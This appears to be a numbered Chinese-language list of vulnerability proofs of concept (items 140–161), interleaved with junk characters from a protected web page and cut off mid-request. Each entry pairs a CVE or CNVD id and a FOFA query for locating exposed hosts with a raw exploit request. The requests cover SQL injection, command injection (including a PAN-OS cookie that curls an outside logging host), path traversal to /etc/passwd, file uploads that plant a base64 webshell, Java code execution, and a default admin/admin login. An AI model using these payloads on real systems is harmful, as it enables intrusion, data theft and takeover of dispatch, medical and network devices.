8 o# M {' ?8 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0$ X! [0 p8 E7 B4 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 Z1 G. Q9 c' l3 h6 N. s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 n, r& F; h' o! C3 v+ L: @* M
Accept-Encoding: gzip, deflate, br8 R, x; F( Z' ~/ R/ b4 Q8 }
Connection: close9 E' W) _( g6 z3 M6 G3 t
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
4 b2 ?+ i4 j9 yUpgrade-Insecure-Requests: 1
; ]% u4 e/ K5 c2 I$ Q8 {7 Z1 {) G7 J# o! Q
; T _/ I8 R/ S- J5 l4 T1 @
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
1 H6 f6 G" Y3 o/ M% D1 y0 I; [( YCVE-2024-25666 ]6 T, Z$ |7 V
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"! D! O! n: g) T3 l, F0 D
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.13 }% e# ]/ T( o; h: x6 j, ]
Host: x.x.x.x% d) m- \. J7 D9 e% Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 w. r7 Y) J; s! z" j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' `* H2 H; r/ A( ~2 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: A) d6 H& E; x) p- k5 v
Accept-Encoding: gzip, deflate, br
# O3 ?/ C/ G7 F9 z+ _" xConnection: close
4 A% q+ H; S& f9 U) `, WCookie: authcode=h8g9! ~0 H" I& ]( M9 [
Upgrade-Insecure-Requests: 1
4 E+ i; G& Q! f' m; d
4 K/ T1 y6 g4 G. a: l: ?7 L }, p* K+ M4 X y
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
- f/ x3 h. z- K5 n1 cFOFA:body="指挥调度管理平台"
4 M4 c( x* T0 S; C1 W: vPOST /app/ext/ajax_users.php HTTP/1.1
! }3 o; o" B: J* T# h. ^Host: your-ip, g: l+ K+ c+ B7 z
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
" P' ?; V+ j' `) _( O! w1 O: w% DContent-Type: application/x-www-form-urlencoded' Z) V5 `, ^; k+ B5 b
3 y" [; s; M8 @0 \$ ?2 I' z/ G! `9 z. e
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -# `/ w$ {. \4 o+ y4 T/ N9 @& O
. D& H2 P. R9 }: c; o( W2 s! @
# u6 q3 k- ^1 h: L6 |7 D/ \
142. CMSV6车辆监控平台系统中存在弱密码$ k m. C3 e9 u! ?; | s
CVE-2024-29666* s! Y/ q& [. v/ M: F
FOFA:body="/808gps/" b2 G9 S; Q a
admin/admin
, r; _% {, k/ j @# s8 S( Q- h143. Netis WF2780 v2.1.40144 远程命令执行
8 T a3 o7 z7 m/ n( j0 Q4 ^CVE-2024-25850
& F+ E9 a5 g. s: c9 k" v KFOFA:title='AP setup' && header='netis'
) P5 S5 u! z$ [" o& `, m* \% c1 Z# |PAYLOAD- J! A. H; G" f: B7 ~5 g
/ G" c5 a2 g0 y; p0 B
144. D-Link nas_sharing.cgi 命令注入
) l' X* K- w6 T* \FOFA:app="D_Link-DNS-ShareCenter"
2 ^' x/ I+ V: @system参数用于传要执行的命令. F, a& s8 T% V, z: f6 p
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
# g8 @! h+ e3 n5 c, l- j# _( S( yHost: x.x.x.x
m/ d1 Y+ c+ Q: QUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.00 j/ S; J! A% ~0 s! l& s( x* s( M
Connection: close
7 r+ ?- M$ n W$ Q7 d8 Y c* uAccept: */*/ K/ |' j& m8 C5 v2 \
Accept-Language: en
% b4 r6 z5 G5 K* bAccept-Encoding: gzip& i$ y1 f6 Q# @8 G! ^1 u2 Z7 i) j
: b$ v& v" P: V8 K
) M& | L% {0 G4 I, B3 y3 p
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入: G% X% o$ [0 C) m& V+ J0 T
CVE-2024-3400
, v8 [2 i; A* v6 ^1 |* v' o! a/ yFOFA:icon_hash="-631559155"0 s) R+ F. l- f+ R6 b; O( u/ e
GET /global-protect/login.esp HTTP/1.1
4 k. C$ w4 E* H4 oHost: 192.168.30.112:1005
/ r7 _1 B% B" V7 T$ Q- L0 T9 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.841 b2 T1 k* P( A0 v
Connection: close% v/ U, t7 i; W
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;) T3 l- d1 l. m% \" B
Accept-Encoding: gzip
1 Y- _. Q3 L8 N! U+ ]* p+ H) d" o- U; ^5 b G7 R1 W
8 H' P' t/ q8 T- X0 a146. MajorDoMo thumb.php 未授权远程代码执行
! S& \6 w! d4 p, O# m, j: nCNVD-2024-02175
% i( v0 w$ [ K% H5 a. `4 ?$ T. ?FOFA:app="MajordomoSL"
# h7 |7 J! b+ F/ M, Q8 fGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
4 d$ d8 m8 ~2 k- R. Q2 C F k$ THost: x.x.x.x
/ H. l, V. N# }0 ]1 \5 Z; H& O5 y/ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.846 ^* l2 ]7 ]+ I/ H
Accept-Charset: utf-8
& e5 V% i4 U' a( e% JAccept-Encoding: gzip, deflate
) j( r$ q' Y2 A# |Connection: close
u6 N; {4 j6 J9 r/ z5 Y6 ?# S% _4 Q
/ L" ~! h7 T; f. Q. {6 j
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
+ w7 k) R, I0 C) JCVE-2024-32399
3 h6 ]6 M1 ~' eFOFA:body="RaidenMAILD"
8 u4 W3 ^. n( h- n' r3 AGET /webeditor/../../../windows/win.ini HTTP/1.1
' W( u6 Y. j" T! c3 E# ?Host: 127.0.0.1:81! b, T4 N2 k1 E4 c h( v. ^2 f
Cache-Control: max-age=0; ]& v5 T7 y) M
Connection: close
) r) E) |+ w; p& O2 ?- S6 w3 Z3 O2 ^* }0 W9 ?8 @ I$ V5 A
/ l! S) g Q* d- {5 @, @
148. CrushFTP 认证绕过模板注入
: v q& O1 F. V! ICVE-2024-4040
/ O# p1 i' F0 PFOFA:body="CrushFTP"
+ { b- C6 o IPAYLOAD
5 x4 \* y# ?! s6 k" h4 @' G0 ?, f- Z1 A
149. AJ-Report开源数据大屏存在远程命令执行
) j h! L( n' T6 IFOFA:title="AJ-Report", ~5 N" @3 @4 F8 e9 {: A
/ r/ k4 C& [5 k8 R$ w% Z
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
+ g, {4 ^9 e M2 q" J! K5 UHost: x.x.x.x
# x& r; Y7 i: x7 [7 _: lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. E7 A' [* F7 O+ ^6 `# B, O/ yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; S' C5 x8 z6 _: q) m1 H; WAccept-Encoding: gzip, deflate, br
2 m; ^3 P: ~/ R; g* ?6 \1 IAccept-Language: zh-CN,zh;q=0.9' D0 W7 E2 ~3 u* Z& G r
Content-Type: application/json;charset=UTF-8
1 M# ]) ^$ C; G2 J1 vConnection: close
, q5 h f/ X5 x h
7 _' S" ]6 x* g+ f8 ]{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
, a" d) U/ Z+ t/ p$ E" F
2 J& q5 [! o9 b. j5 F- a* B150. AJ-Report 1.4.0 认证绕过与远程代码执行
0 v3 s' v+ D6 e" J) N) y2 s" bFOFA:title="AJ-Report"
( A: z$ G, ^) s6 PPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
1 G& Q/ j) n1 ?+ v+ ? Q7 fHost: x.x.x.x+ _$ L7 I0 y/ `/ f% Z. p" C) k/ Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( j W" E# y f& n# S' BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; e2 x, F8 r7 p2 @! f' @+ D$ X
Accept-Encoding: gzip, deflate, br, ]( G1 [/ x, B) |) D( G5 S
Accept-Language: zh-CN,zh;q=0.9
# t: G+ I3 u2 Y1 k# Q& S* AContent-Type: application/json;charset=UTF-87 z2 I( T6 m, W& G" H/ O4 q% e
Connection: close
# W8 |3 V+ o- e" K. k( eContent-Length: 3391 Y1 n7 \9 e3 T% o9 m
- Z3 M0 S+ m8 t/ ~) X9 G. Y( V
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}/ b3 c1 u# F0 ~! E) v* ~
) Y5 h: B% e; V) g& G o! p# T q5 \9 c- ?" U& t
151. AJ-Report 1.4.1 pageList sql注入8 g# g9 E6 K9 U# B5 _
FOFA:title="AJ-Report"
; ?; J% L; o, }) Y9 KGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1* |3 V0 g, R$ F6 L. n G( R
Host: x.x.x.x: B0 R: O) D; n, M' I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ \: A6 C8 I" s7 c7 s
Connection: close
% I- @( ~$ a5 ~) fAccept-Encoding: gzip
! v7 L K. N n! |/ h
: o. x' Y5 g8 \8 Y& R- N
# k! K. d6 J! K1 ^152. Progress Kemp LoadMaster 远程命令执行* h/ d( W% z; p; \3 e
CVE-2024-1212
- C; L" W2 [" Q3 X LLoadMaster <= 7.2.59.2 (GA)% p* N' u! m/ {7 s* e' m
LoadMaster<=7.2.54.8 (LTSF)* C) n. k+ N( J) S/ w) v
LoadMaster <= 7.2.48.10 (LTS)0 o/ c0 {5 i: m) u0 z% u" K6 x
FOFA:body="LoadMaster"
% Z! [! R, b- D7 t1 iJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
8 e! l+ M5 a- m* p" A4 r( iGET /access/set?param=enableapi&value=1 HTTP/1.1. Q0 q; B. e0 U( A. q/ w ~
Host: x.x.x.x! a+ R6 F" n- A, x, P* Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1- Q; U+ i( ~" B& l" O
Connection: close1 n: _, s4 h) |. T4 d6 J+ R. ~
Accept: */*
) e0 s7 ~3 m# v9 p+ t5 \Accept-Language: en! B; @- F* p% y/ P
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
5 g( D3 R. \/ R/ R0 o! CAccept-Encoding: gzip
8 N8 `. L; C) }8 F8 g! O! s5 ?9 e. `" P. w) k9 L
: ] h/ B' d7 k. c; t3 o/ [+ d153. gradio任意文件读取: k" W+ Z* c6 }! |/ y
CVE-2024-1561FOFA:body="__gradio_mode__"
/ y3 K& R/ G- ~3 ^$ V- e第一步,请求/config文件获取componets的id
9 a5 P$ e! j+ z+ `http://x.x.x.x/config# I, s( ^- e7 I6 U- V2 i
9 C9 E0 ?) m7 e( I7 ~2 t! ?
! V9 q4 C d9 }5 m# @4 D
第二步,将/etc/passwd的内容写入到一个临时文件
0 J( m+ M# _7 a, A* D& x' bPOST /component_server HTTP/1.1
: b" h* u; Z3 i0 BHost: x.x.x.x
# ?6 R {8 K C, c+ eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3' j8 G5 v8 m; n; H4 {
Connection: close
( g5 \6 e* l) F7 ]$ }Content-Length: 115
- R) P9 M) ]% n9 y2 w4 CContent-Type: application/json3 W+ r, {2 _. S/ j5 ]) y& T
Accept-Encoding: gzip
6 ?! y& V3 T# G$ i! [- ` c3 j. p3 f! K5 n+ @: R
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}$ x* Z" U ~ H" K6 a" H- \ O
/ r6 y J) b1 }$ S9 s
. d0 s8 ?! @( x* V
第三步访问
! M% _2 H- z$ Y ]1 ghttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd* j c! Q- @2 N' t( x z/ A8 T
. w# I$ ~7 C7 o% W1 B3 r9 A+ ~. E7 F
2 Z& i6 V$ M, F2 S3 |154. 天维尔消防救援作战调度平台 SQL注入
! g8 O2 j, X" K9 Z5 GCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
4 J- s$ E) I s) gPOST /twms-service-mfs/mfsNotice/page HTTP/1.11 b* N6 J4 P2 k1 M( _: z2 m t
Host: x.x.x.x
5 S1 ?* b0 N/ ~5 Z; E9 I1 IContent-Length: 1060 u, S& i6 d% @& O8 O J+ L
Cache-Control: max-age=0* U3 _! e6 X5 v' h k
Upgrade-Insecure-Requests: 1" U. T" H" X5 x7 D3 u+ S1 X
Origin: http://x.x.x.x- J' p p! W! h: a/ V
Content-Type: application/json
6 u3 ~' I9 ?. Q# }2 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36+ x, Q8 N, @4 h. c+ _% _! P3 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 Z, C7 E; L1 J% C% _Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
' ?. Q7 b" h9 k0 _: rAccept-Encoding: gzip, deflate
$ D0 f; V7 p0 S- n' dAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
8 s+ l" @1 ]" Q" P0 lConnection: close
1 E0 l' ~/ ^ y6 R" F" a0 c, v# |, a' z$ w# W2 ?- }; H5 A9 I( m# y
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}0 H& h7 q4 q4 \ i* ]9 g
" j, M- A+ k( I, v
) o# F# g- f/ x4 z4 C r& Q155. 六零导航页 file.php 任意文件上传
' s3 h; U* C" H" OCVE-2024-34982
5 \, P: U; E2 W3 z3 L% z0 RFOFA:title=="上网导航 - LyLme Spage"
/ S! a2 F, K5 Y1 I4 @ N& NPOST /include/file.php HTTP/1.1
% j" `6 E7 `. w3 qHost: x.x.x.x3 p U* m: z5 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
) v! y4 F: K& D+ K7 S# PConnection: close
8 {5 x: V0 c" i, n# Y( FContent-Length: 232
3 b3 y1 o7 q" q" O& IAccept: application/json, text/javascript, */*; q=0.01 |# V# K5 `- K9 \
Accept-Encoding: gzip, deflate, br
8 B3 h% l$ \7 v% t( Q' t$ lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 K$ L* Q4 t* f9 |8 A7 zContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
+ j7 H T% C% T. r: j5 a/ sX-Requested-With: XMLHttpRequest) I( K! ]$ n, t
# _4 r6 K/ J7 ^; m-----------------------------qttl7vemrsold314zg0f* n( {( M" L$ A! B/ r- D
Content-Disposition: form-data; name="file"; filename="test.php"! P, [# l' c! h/ r" p T
Content-Type: image/png
$ b+ v6 I; f5 x3 P9 I5 I" Y+ e4 u: R g3 E# b& v) r- C8 u" w9 b) A+ E. J
<?php phpinfo();unlink(__FILE__);?>
/ B8 H) s) q0 y+ I4 ?: @/ v ~ m-----------------------------qttl7vemrsold314zg0f--; \& p; ^& z" F! W
' @4 A% k0 M9 N% {1 d6 ?: G- j$ T. h, _
( q# E, U$ U3 d9 k% D( s( R访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
" `' U2 N9 ^, L0 B; d
% z( E8 g5 v; a: o q4 K1 q156. TBK DVR-4104/DVR-4216 操作系统命令注入: q: l B! g4 X$ b; v: K
CVE-2024-3721
! l! z* Y. ^9 ZFOFA:"Location: /login.rsp"
7 W% n3 ]# J5 G' F4 ~·TBK DVR-4104& e5 P( G4 `/ d8 U+ v. C
·TBK DVR-4216
- V0 |" W/ {1 zcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
6 w; {0 @3 C6 K0 ^
3 [: ~1 j( R& e) Y6 h2 ^5 b: I$ d# S, A) K& n4 ?: R
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
. o4 v* e, C# y0 p8 W; GHost: x.x.x.x( C# s. U; m! l9 N% k( C! Z; Z$ ^; m
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) F) V" E3 c4 T. k+ h3 ^( d( v. A: AConnection: close0 \+ {8 F+ c) P, B# h" L
Content-Length: 0
8 C( T9 o9 ], A2 y1 l. ~Cookie: uid=1
2 v7 O3 D2 L k2 T7 gAccept-Encoding: gzip, M$ I0 [/ l4 `- N. f& T
# D7 f7 `3 w+ V8 O# X
& h' e [# q' D3 q2 j" @' E
157. 美特CRM upload.jsp 任意文件上传: r" `6 e% Q0 L* @5 F9 a' G
CNVD-2023-06971
# s5 d8 ~" Q+ h1 ~7 X/ nFOFA:body="/common/scripts/basic.js"
6 u+ R& }3 r( cPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
$ \" B3 R5 n8 _$ s: sHost: x.x.x.x! r/ T& ?, F2 r+ D4 j* J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36$ c1 ~' j) b$ `4 M/ G, {9 n% U
Content-Length: 709
5 h' J. x: L8 `; P9 m7 E! pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ L6 U d( r/ @* s* ~- ?! O! T
Accept-Encoding: gzip, deflate$ Z3 E5 w5 ?' q
Accept-Language: zh-CN,zh;q=0.9
0 n9 P/ [+ A; B' K: _3 ZCache-Control: max-age=0
, L) U' |/ S/ g+ M! a5 _4 E6 wConnection: close8 A: n3 v( X# v6 U: ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
. h0 y. K, B* ~7 w+ K3 YUpgrade-Insecure-Requests: 1
/ d) v4 A ]; c. P
. M9 `8 T/ k$ P) p1 T, V------WebKitFormBoundary1imovELzPsfzp5dN3 i/ v+ b+ d1 P4 c) Q! q1 I5 }
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
; L; \2 y7 G& b2 z, K/ EContent-Type: application/octet-stream9 C' D5 ]8 T; d2 G0 @6 q- ?
6 i" y; e0 ?( `8 fnyhelxrutzwhrsvsrafb, a* [ S- D6 u, R' f
------WebKitFormBoundary1imovELzPsfzp5dN
) J8 H. j, ]4 l% \1 {5 ^$ xContent-Disposition: form-data; name="key"
. L: {$ W0 E. _
$ n: G: R: ?( w+ snull
0 p: R( ^3 o( ?------WebKitFormBoundary1imovELzPsfzp5dN9 Y6 j9 \" J8 h8 M! y
Content-Disposition: form-data; name="form"
. h# ~( c8 T5 l2 }+ p) a( L. a5 w% x. r) d7 D
null/ E: E* l. G, Z8 V2 D" {9 V# S! ~( u
------WebKitFormBoundary1imovELzPsfzp5dN
% A A0 I& [6 P& B+ bContent-Disposition: form-data; name="field"$ A t/ u$ }& T h' U% n0 r6 w
, q$ F: `" [8 I1 L! ^6 h% i! G
null( C& m3 F# o: d. M( X: |
------WebKitFormBoundary1imovELzPsfzp5dN
+ G4 w6 V0 N& R wContent-Disposition: form-data; name="filetitile"
" G# s6 Y8 D! c6 ?4 B0 ~- k) r1 d. ]& ^3 D# f$ a# T
null
/ j" P: s# c4 L" v# l; {( |------WebKitFormBoundary1imovELzPsfzp5dN! d" P7 I/ C6 M; E b- x5 M
Content-Disposition: form-data; name="filefolder"
- |5 ~; D1 Y6 k9 m2 ?- c
+ ]8 e1 V& O2 ~5 ?, mnull
4 L5 v5 E* m, i9 [4 O------WebKitFormBoundary1imovELzPsfzp5dN--
: j$ K s1 b. D! |5 x6 W, @& {4 P7 e) [. s' @/ t
- W: p- |' H5 B5 V6 ]9 @
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp2 H& b: E4 s( [' C# E) _
+ z- Z8 s; i! E; [* K- k' a1 x
158. Mura-CMS-processAsyncObject存在SQL注入5 E. S/ z ?1 L3 p+ U( t
CVE-2024-32640! K8 ?) I, G- A( ?8 J+ X
FOFA:"Generator: Masa CMS"7 @# n$ U2 u: q$ g
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
7 n9 q$ Z" N0 z/ ~. C$ THost: {{Hostname}} q% g9 a- v; j: H/ K( R! t/ p2 L
Content-Type: application/x-www-form-urlencoded
* f3 c1 S7 @ L, M8 q
: ?1 \. e5 {2 Z/ fobject=displayregion&contenthistid=x\'&previewid=1
: j4 r0 _+ o, N; b* J0 U% e+ Y* v& F( n/ D
$ v5 t. q0 W+ G& f- M159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
0 y0 t: X4 P; ~1 m: VFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
8 C1 ^1 J0 A/ @' g1 O5 k, hPOST /webservices/WebJobUpload.asmx HTTP/1.14 m! n5 R: B/ x, \
Host: x.x.x.x
7 U r! S0 d; n) R: nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36' i1 g/ D! V5 f! Z7 ]
Content-Length: 1080
, [- |" k: r" @+ D- B1 s! F( _- GAccept-Encoding: gzip, deflate
" {7 c- F' Y$ d+ p% a$ c$ Z$ sConnection: close# h$ w5 ^, v9 H _+ V* i* u0 \
Content-Type: text/xml; charset=utf-8
/ s8 P, c. f* g, s: k: c7 |. \Soapaction: "http://rainier/jobUpload"$ d( X! Z3 R( t0 K! |
3 S8 l, [; w: B' U- ?8 O( U9 k<?xml version="1.0" encoding="utf-8"?>
1 v# x8 a6 R8 Z+ |<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
3 b- K3 J( J( I) x<soap:Body>! u# [$ O4 C. d' x1 _+ \
<jobUpload xmlns="http://rainier">
5 h% k, J8 z# [1 X<vcode>1</vcode>) u1 A4 V% v$ ^3 {1 X1 r6 m
<subFolder></subFolder>0 ~2 ?; w4 y- k( N5 m
<fileName>abcrce.asmx</fileName>+ @! H' q( b) O2 }1 Z
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>1 W3 \/ x" r8 H
</jobUpload>
! A7 \ C9 k. j. i _</soap:Body>8 W/ t- a6 X$ o+ \
</soap:Envelope>- @ b9 q* P6 R# x) k+ d6 a' A
* r. w" n) g# M; D- I
' p7 z/ |) M1 }& N2 u( {
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
! I$ {5 C) @! _ ^/ u
1 B; _) c5 T% ]+ s2 w& J: r) [2 F# ~. X+ W% U; I B) y) u
160. Sonatype Nexus Repository 3目录遍历与文件读取
3 P. t4 k" X+ _& {7 _* x p) lCVE-2024-4956
9 J- v' N3 n5 D* NFOFA:title="Nexus Repository Manager"9 \% {! \* D0 a3 L) ^
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
" }4 h/ ^, H8 g. @( X( RHost: x.x.x.x' p( K4 l4 a8 @, F. A& y1 a+ s
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
( F c: N0 n9 o) wConnection: close0 _. [& U2 i, \" y* M3 b
Accept: */*
2 G: M+ Q) `" c8 s& f' a& Y2 VAccept-Language: en
: {3 g2 I8 z' RAccept-Encoding: gzip
& Z& T- k7 ?2 k8 D
; p9 o' A) g$ u* w3 v% Y. m2 e5 P$ Z
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传& n$ J! [1 Q% S, b- g
FOFA:body="/KT_Css/qd_defaul.css"* N4 G3 I( Q; x T+ }' w7 }! e
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
% v$ N, Y0 ?* d+ v' ^, S0 wPOST /Webservice.asmx HTTP/1.14 H h1 k; W" \: i$ }
Host: x.x.x.x+ J. W0 f" }7 q) _/ U5 L% G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
3 {) F$ @5 H- g5 g- zConnection: close% D- L; w3 @* g
Content-Length: 445
$ U2 Q4 H2 c4 o% L# U9 I rContent-Type: text/xml
" `: ~" n+ M" z, ZAccept-Encoding: gzip8 H. S$ u5 D0 c: P6 u# i
+ b" l) ^4 V3 y9 l. O+ {, Z<?xml version="1.0" encoding="utf-8"?>, H* ]7 U9 N0 O- s. a5 N
<soap:Envelope xmlns:xsi="- k+ J1 o6 O# }: M0 Y
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"- o: E! J: d8 V3 N; C6 y. V5 q
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">4 \- s* Y, b- ` { n: R
<soap:Body>' Q: r) T. Y! e
<UploadResume xmlns="http://tempuri.org/">
3 A) k' ~( u& @5 Z6 ^<ip>1</ip>
" F; r- l9 d; [/ D _; R<fileName>../../../../dizxdell.aspx</fileName>6 ?* L; \; X H, ]( }
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
